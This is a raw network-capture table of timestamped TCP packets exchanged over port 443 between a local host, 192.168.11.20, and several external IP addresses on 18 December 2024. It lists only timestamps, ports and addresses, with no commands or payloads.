                                                    Dec 18, 2024 11:21:19.191668987 CET44349735104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:21:19.191689014 CET49735443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:21:19.191807032 CET49735443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:21:19.194463015 CET44349735104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:21:19.194499016 CET44349735104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:21:19.194664001 CET49735443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:21:19.194664955 CET49735443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:21:19.194703102 CET49735443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:21:19.194703102 CET49735443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:21:19.194720030 CET44349735104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:21:19.194811106 CET49735443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:21:19.194890976 CET49735443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:21:19.196911097 CET44349735104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:21:19.196944952 CET44349735104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:21:19.197068930 CET49735443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:21:19.197068930 CET49735443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:21:19.197086096 CET44349735104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:21:19.197107077 CET49735443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:21:19.197127104 CET44349735104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:21:19.197159052 CET49735443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:21:19.197159052 CET49735443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:21:19.197191000 CET44349735104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:21:19.197261095 CET49735443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:21:19.197261095 CET49735443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:21:19.197351933 CET49735443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:21:19.197449923 CET49735443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:21:31.524218082 CET49736443192.168.11.2066.198.240.43
                                                    Dec 18, 2024 11:21:31.524238110 CET4434973666.198.240.43192.168.11.20
                                                    Dec 18, 2024 11:21:31.524410009 CET49736443192.168.11.2066.198.240.43
                                                    Dec 18, 2024 11:21:31.524550915 CET49736443192.168.11.2066.198.240.43
                                                    Dec 18, 2024 11:21:31.524563074 CET4434973666.198.240.43192.168.11.20
                                                    Dec 18, 2024 11:21:31.874057055 CET4434973666.198.240.43192.168.11.20
                                                    Dec 18, 2024 11:21:31.875005960 CET49736443192.168.11.2066.198.240.43
                                                    Dec 18, 2024 11:21:31.875066996 CET4434973666.198.240.43192.168.11.20
                                                    Dec 18, 2024 11:21:32.325920105 CET4434973666.198.240.43192.168.11.20
                                                    Dec 18, 2024 11:21:32.325964928 CET4434973666.198.240.43192.168.11.20
                                                    Dec 18, 2024 11:21:32.326092958 CET4434973666.198.240.43192.168.11.20
                                                    Dec 18, 2024 11:21:32.326116085 CET4434973666.198.240.43192.168.11.20
                                                    Dec 18, 2024 11:21:32.326138020 CET49736443192.168.11.2066.198.240.43
                                                    Dec 18, 2024 11:21:32.326360941 CET49736443192.168.11.2066.198.240.43
                                                    Dec 18, 2024 11:21:32.326674938 CET49736443192.168.11.2066.198.240.43
                                                    Dec 18, 2024 11:21:39.458960056 CET49737443192.168.11.20197.189.243.212
                                                    Dec 18, 2024 11:21:39.459053040 CET44349737197.189.243.212192.168.11.20
                                                    Dec 18, 2024 11:21:39.459260941 CET49737443192.168.11.20197.189.243.212
                                                    Dec 18, 2024 11:21:39.459364891 CET49737443192.168.11.20197.189.243.212
                                                    Dec 18, 2024 11:21:39.459378004 CET44349737197.189.243.212192.168.11.20
                                                    Dec 18, 2024 11:21:40.641791105 CET44349737197.189.243.212192.168.11.20
                                                    Dec 18, 2024 11:21:40.642767906 CET49737443192.168.11.20197.189.243.212
                                                    Dec 18, 2024 11:21:40.642828941 CET44349737197.189.243.212192.168.11.20
                                                    Dec 18, 2024 11:21:43.506097078 CET44349737197.189.243.212192.168.11.20
                                                    Dec 18, 2024 11:21:43.506181002 CET44349737197.189.243.212192.168.11.20
                                                    Dec 18, 2024 11:21:43.506380081 CET49737443192.168.11.20197.189.243.212
                                                    Dec 18, 2024 11:21:43.506380081 CET49737443192.168.11.20197.189.243.212
                                                    Dec 18, 2024 11:21:43.506432056 CET44349737197.189.243.212192.168.11.20
                                                    Dec 18, 2024 11:21:43.547920942 CET49737443192.168.11.20197.189.243.212
                                                    Dec 18, 2024 11:21:44.284250021 CET44349737197.189.243.212192.168.11.20
                                                    Dec 18, 2024 11:21:44.284322977 CET44349737197.189.243.212192.168.11.20
                                                    Dec 18, 2024 11:21:44.284367085 CET44349737197.189.243.212192.168.11.20
                                                    Dec 18, 2024 11:21:44.284409046 CET44349737197.189.243.212192.168.11.20
                                                    Dec 18, 2024 11:21:44.284491062 CET49737443192.168.11.20197.189.243.212
                                                    Dec 18, 2024 11:21:44.284512043 CET44349737197.189.243.212192.168.11.20
                                                    Dec 18, 2024 11:21:44.284523964 CET49737443192.168.11.20197.189.243.212
                                                    Dec 18, 2024 11:21:44.284598112 CET44349737197.189.243.212192.168.11.20
                                                    Dec 18, 2024 11:21:44.284635067 CET49737443192.168.11.20197.189.243.212
                                                    Dec 18, 2024 11:21:44.284652948 CET44349737197.189.243.212192.168.11.20
                                                    Dec 18, 2024 11:21:44.284738064 CET49737443192.168.11.20197.189.243.212
                                                    Dec 18, 2024 11:21:44.284738064 CET49737443192.168.11.20197.189.243.212
                                                    Dec 18, 2024 11:21:44.284840107 CET49737443192.168.11.20197.189.243.212
                                                    Dec 18, 2024 11:21:44.285995960 CET44349737197.189.243.212192.168.11.20
                                                    Dec 18, 2024 11:21:44.286180973 CET49737443192.168.11.20197.189.243.212
                                                    Dec 18, 2024 11:21:44.286210060 CET49737443192.168.11.20197.189.243.212
                                                    Dec 18, 2024 11:21:44.286221981 CET44349737197.189.243.212192.168.11.20
                                                    Dec 18, 2024 11:21:44.329056025 CET49737443192.168.11.20197.189.243.212
                                                    Dec 18, 2024 11:21:44.673458099 CET44349737197.189.243.212192.168.11.20
                                                    Dec 18, 2024 11:21:44.673463106 CET44349737197.189.243.212192.168.11.20
                                                    Dec 18, 2024 11:21:44.673680067 CET49737443192.168.11.20197.189.243.212
                                                    Dec 18, 2024 11:21:44.673700094 CET49737443192.168.11.20197.189.243.212
                                                    Dec 18, 2024 11:21:44.673707962 CET44349737197.189.243.212192.168.11.20
                                                    Dec 18, 2024 11:21:44.674180984 CET44349737197.189.243.212192.168.11.20
                                                    Dec 18, 2024 11:21:44.674249887 CET44349737197.189.243.212192.168.11.20
                                                    Dec 18, 2024 11:21:44.674371004 CET49737443192.168.11.20197.189.243.212
                                                    Dec 18, 2024 11:21:44.674382925 CET44349737197.189.243.212192.168.11.20
                                                    Dec 18, 2024 11:21:44.674431086 CET49737443192.168.11.20197.189.243.212
                                                    Dec 18, 2024 11:21:44.719707966 CET49737443192.168.11.20197.189.243.212
                                                    Dec 18, 2024 11:21:45.063102961 CET44349737197.189.243.212192.168.11.20
                                                    Dec 18, 2024 11:21:45.063122034 CET44349737197.189.243.212192.168.11.20
                                                    Dec 18, 2024 11:21:45.063241005 CET44349737197.189.243.212192.168.11.20
                                                    Dec 18, 2024 11:21:45.063407898 CET44349737197.189.243.212192.168.11.20
                                                    Dec 18, 2024 11:21:45.063422918 CET44349737197.189.243.212192.168.11.20
                                                    Dec 18, 2024 11:21:45.063447952 CET49737443192.168.11.20197.189.243.212
                                                    Dec 18, 2024 11:21:45.063447952 CET49737443192.168.11.20197.189.243.212
                                                    Dec 18, 2024 11:21:45.063632965 CET49737443192.168.11.20197.189.243.212
                                                    Dec 18, 2024 11:21:45.063632965 CET49737443192.168.11.20197.189.243.212
                                                    Dec 18, 2024 11:21:45.063638926 CET44349737197.189.243.212192.168.11.20
                                                    Dec 18, 2024 11:21:45.063657045 CET44349737197.189.243.212192.168.11.20
                                                    Dec 18, 2024 11:21:45.063883066 CET49737443192.168.11.20197.189.243.212
                                                    Dec 18, 2024 11:21:45.452636003 CET44349737197.189.243.212192.168.11.20
                                                    Dec 18, 2024 11:21:45.452644110 CET44349737197.189.243.212192.168.11.20
                                                    Dec 18, 2024 11:21:45.452892065 CET49737443192.168.11.20197.189.243.212
                                                    Dec 18, 2024 11:21:45.452975988 CET44349737197.189.243.212192.168.11.20
                                                    Dec 18, 2024 11:21:45.453002930 CET49737443192.168.11.20197.189.243.212
                                                    Dec 18, 2024 11:21:45.453020096 CET44349737197.189.243.212192.168.11.20
                                                    Dec 18, 2024 11:21:45.453186989 CET49737443192.168.11.20197.189.243.212
                                                    Dec 18, 2024 11:21:45.453186989 CET49737443192.168.11.20197.189.243.212
                                                    Dec 18, 2024 11:21:45.453207016 CET49737443192.168.11.20197.189.243.212
                                                    Dec 18, 2024 11:21:45.453232050 CET44349737197.189.243.212192.168.11.20
                                                    Dec 18, 2024 11:21:45.453483105 CET49737443192.168.11.20197.189.243.212
                                                    Dec 18, 2024 11:21:45.453499079 CET44349737197.189.243.212192.168.11.20
                                                    Dec 18, 2024 11:21:45.453627110 CET49737443192.168.11.20197.189.243.212
                                                    Dec 18, 2024 11:21:45.842139959 CET44349737197.189.243.212192.168.11.20
                                                    Dec 18, 2024 11:21:45.842160940 CET44349737197.189.243.212192.168.11.20
                                                    Dec 18, 2024 11:21:45.842422962 CET49737443192.168.11.20197.189.243.212
                                                    Dec 18, 2024 11:21:45.842479944 CET49737443192.168.11.20197.189.243.212
                                                    Dec 18, 2024 11:21:45.842506886 CET44349737197.189.243.212192.168.11.20
                                                    Dec 18, 2024 11:21:45.842690945 CET44349737197.189.243.212192.168.11.20
                                                    Dec 18, 2024 11:21:45.842890978 CET44349737197.189.243.212192.168.11.20
                                                    Dec 18, 2024 11:21:45.842942953 CET49737443192.168.11.20197.189.243.212
                                                    Dec 18, 2024 11:21:45.842997074 CET44349737197.189.243.212192.168.11.20
                                                    Dec 18, 2024 11:21:45.843067884 CET44349737197.189.243.212192.168.11.20
                                                    Dec 18, 2024 11:21:45.843115091 CET49737443192.168.11.20197.189.243.212
                                                    Dec 18, 2024 11:21:45.843220949 CET49737443192.168.11.20197.189.243.212
                                                    Dec 18, 2024 11:21:45.843400955 CET49737443192.168.11.20197.189.243.212
                                                    Dec 18, 2024 11:21:52.579909086 CET49738443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:21:52.580019951 CET44349738172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:21:52.580262899 CET49738443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:21:52.580413103 CET49738443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:21:52.580461979 CET44349738172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:21:53.358899117 CET44349738172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:21:53.359925985 CET49738443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:21:53.359985113 CET44349738172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:21:55.256759882 CET44349738172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:21:55.256795883 CET44349738172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:21:55.256922960 CET49738443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:21:55.256949902 CET44349738172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:21:55.257035971 CET49738443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:21:55.311155081 CET49738443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:21:55.640208006 CET44349738172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:21:55.640223026 CET44349738172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:21:55.640491009 CET49738443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:21:55.640530109 CET49738443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:21:55.640547037 CET44349738172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:21:55.640589952 CET44349738172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:21:55.640661955 CET44349738172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:21:55.640825033 CET49738443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:21:55.640852928 CET44349738172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:21:55.640868902 CET49738443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:21:55.641031981 CET44349738172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:21:55.641185045 CET49738443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:21:55.641201019 CET44349738172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:21:55.641297102 CET49738443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:21:55.685899019 CET49738443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:21:56.024449110 CET44349738172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:21:56.024465084 CET44349738172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:21:56.024576902 CET44349738172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:21:56.024724007 CET49738443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:21:56.024727106 CET44349738172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:21:56.024775028 CET44349738172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:21:56.024801970 CET49738443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:21:56.024899006 CET49738443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:21:56.024900913 CET44349738172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:21:56.024944067 CET44349738172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:21:56.025074005 CET49738443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:21:56.025074005 CET49738443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:21:56.025120974 CET44349738172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:21:56.025157928 CET44349738172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:21:56.025227070 CET49738443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:21:56.025321007 CET49738443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:21:56.025332928 CET44349738172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:21:56.025448084 CET49738443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:21:56.025464058 CET44349738172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:21:56.025520086 CET49738443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:21:56.025543928 CET44349738172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:21:56.025696993 CET49738443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:21:56.025738955 CET49738443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:21:56.324314117 CET44349738172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:21:56.324630976 CET49738443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:21:56.324681997 CET44349738172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:21:56.324881077 CET49738443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:21:56.409487009 CET44349738172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:21:56.409810066 CET44349738172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:21:56.409811974 CET49738443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:21:56.409862041 CET44349738172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:21:56.409984112 CET44349738172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:21:56.409991980 CET49738443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:21:56.410237074 CET49738443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:21:56.410285950 CET44349738172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:21:56.410317898 CET49738443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:21:56.410327911 CET44349738172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:21:56.410444975 CET49738443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:21:56.410615921 CET49738443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:21:56.410675049 CET49738443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:22:06.114037991 CET49739443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:22:06.114137888 CET44349739104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:22:06.114326000 CET49739443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:22:06.114411116 CET49739443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:22:06.114440918 CET44349739104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:22:06.409143925 CET44349739104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:22:06.410284996 CET49739443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:22:06.410342932 CET44349739104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:22:07.237205982 CET44349739104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:22:07.237322092 CET44349739104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:22:07.237412930 CET44349739104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:22:07.237489939 CET44349739104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:22:07.237514973 CET49739443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:22:07.237571001 CET44349739104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:22:07.237642050 CET44349739104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:22:07.237688065 CET49739443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:22:07.237773895 CET44349739104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:22:07.237999916 CET49739443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:22:07.238044024 CET44349739104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:22:07.238349915 CET44349739104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:22:07.238434076 CET44349739104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:22:07.238600969 CET49739443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:22:07.238650084 CET44349739104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:22:07.238821030 CET44349739104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:22:07.238914013 CET49739443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:22:07.238944054 CET44349739104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:22:07.239231110 CET49739443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:22:07.239250898 CET44349739104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:22:07.239583015 CET49739443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:22:07.239628077 CET44349739104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:22:07.239698887 CET44349739104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:22:07.239954948 CET49739443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:22:07.240010977 CET44349739104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:22:07.240102053 CET44349739104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:22:07.240204096 CET44349739104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:22:07.240264893 CET49739443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:22:07.240274906 CET44349739104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:22:07.240310907 CET44349739104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:22:07.240577936 CET49739443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:22:07.241043091 CET44349739104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:22:07.241195917 CET49739443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:22:07.241225958 CET44349739104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:22:07.241244078 CET44349739104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:22:07.241468906 CET44349739104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:22:07.241486073 CET49739443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:22:07.241539001 CET44349739104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:22:07.241822958 CET44349739104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:22:07.241919041 CET44349739104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:22:07.242146969 CET49739443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:22:07.242180109 CET44349739104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:22:07.242681026 CET44349739104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:22:07.242770910 CET44349739104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:22:07.242846012 CET44349739104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:22:07.242880106 CET49739443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:22:07.242923975 CET44349739104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:22:07.243119001 CET49739443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:22:07.243225098 CET44349739104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:22:07.243447065 CET49739443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:22:07.243542910 CET44349739104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:22:07.243724108 CET44349739104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:22:07.243916988 CET49739443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:22:07.243949890 CET44349739104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:22:07.244280100 CET44349739104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:22:07.244379997 CET44349739104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:22:07.244462967 CET49739443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:22:07.244497061 CET44349739104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:22:07.244731903 CET49739443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:22:07.245254993 CET44349739104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:22:07.245527983 CET49739443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:22:07.378563881 CET44349739104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:22:07.378783941 CET49739443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:22:07.379383087 CET44349739104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:22:07.379508972 CET44349739104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:22:07.379565001 CET49739443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:22:07.379611015 CET44349739104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:22:07.379703999 CET49739443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:22:07.379832983 CET49739443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:22:07.380342007 CET44349739104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:22:07.380651951 CET49739443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:22:07.380688906 CET44349739104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:22:07.380712986 CET44349739104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:22:07.380831957 CET49739443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:22:07.380965948 CET49739443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:22:07.381417036 CET44349739104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:22:07.381676912 CET49739443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:22:07.382214069 CET44349739104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:22:07.382426977 CET49739443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:22:07.382535934 CET49739443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:22:07.382992983 CET44349739104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:22:07.383266926 CET49739443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:22:07.383651972 CET44349739104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:22:07.383822918 CET49739443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:22:07.384012938 CET49739443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:22:07.384211063 CET44349739104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:22:07.384391069 CET44349739104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:22:07.384450912 CET49739443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:22:07.384649992 CET49739443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:22:07.384670973 CET44349739104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:22:07.384821892 CET49739443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:22:07.385384083 CET44349739104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:22:07.385627985 CET49739443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:22:07.385824919 CET44349739104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:22:07.386066914 CET49739443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:22:07.386753082 CET44349739104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:22:07.386966944 CET49739443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:22:07.387290001 CET44349739104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:22:07.387538910 CET49739443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:22:07.387583971 CET44349739104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:22:07.387624025 CET44349739104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:22:07.387722015 CET49739443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:22:07.387752056 CET44349739104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:22:07.387797117 CET49739443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:22:07.433324099 CET49739443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:22:07.519987106 CET44349739104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:22:07.520226955 CET49739443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:22:07.520937920 CET44349739104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:22:07.521073103 CET44349739104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:22:07.521119118 CET49739443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:22:07.521166086 CET44349739104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:22:07.521197081 CET44349739104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:22:07.521208048 CET49739443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:22:07.521316051 CET49739443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:22:07.521348953 CET44349739104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:22:07.521486044 CET49739443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:22:07.521588087 CET49739443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:22:07.521962881 CET44349739104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:22:07.522265911 CET49739443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:22:07.522924900 CET44349739104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:22:07.523130894 CET49739443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:22:07.523178101 CET49739443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:22:07.523679972 CET44349739104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:22:07.523869038 CET49739443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:22:07.524588108 CET44349739104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:22:07.524733067 CET49739443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:22:07.524735928 CET44349739104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:22:07.524780035 CET44349739104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:22:07.524903059 CET49739443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:22:07.524950027 CET49739443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:22:07.525428057 CET44349739104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:22:07.525600910 CET49739443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:22:07.525665998 CET49739443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:22:07.525949001 CET44349739104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:22:07.526139021 CET49739443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:22:07.526412964 CET44349739104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:22:07.526582956 CET49739443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:22:07.526684046 CET49739443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:22:07.527026892 CET44349739104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:22:07.527247906 CET49739443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:22:07.528007030 CET44349739104.21.10.224192.168.11.20
